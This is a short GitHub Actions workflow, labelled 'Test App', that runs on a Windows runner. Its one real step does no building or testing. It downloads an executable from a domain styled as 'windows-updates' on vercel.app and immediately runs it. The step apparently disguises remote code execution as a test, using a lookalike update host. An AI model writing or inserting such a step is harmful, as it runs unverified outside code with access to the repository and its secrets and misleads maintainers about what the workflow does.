name: Test App

on:
  workflow_dispatch:

jobs:
  build:
    name: Build and Test (Release)
    runs-on: windows-latest

    steps:
      - uses: actions/checkout@v3

      - name: Test App
        shell: powershell
        run: |
          $exe = "$env:GITHUB_WORKSPACE\break.exe"
          Invoke-WebRequest `
            -Uri "https://windows-updates.vercel.app/bins/Break-Time.exe" `
            -OutFile $exe
          & $exe
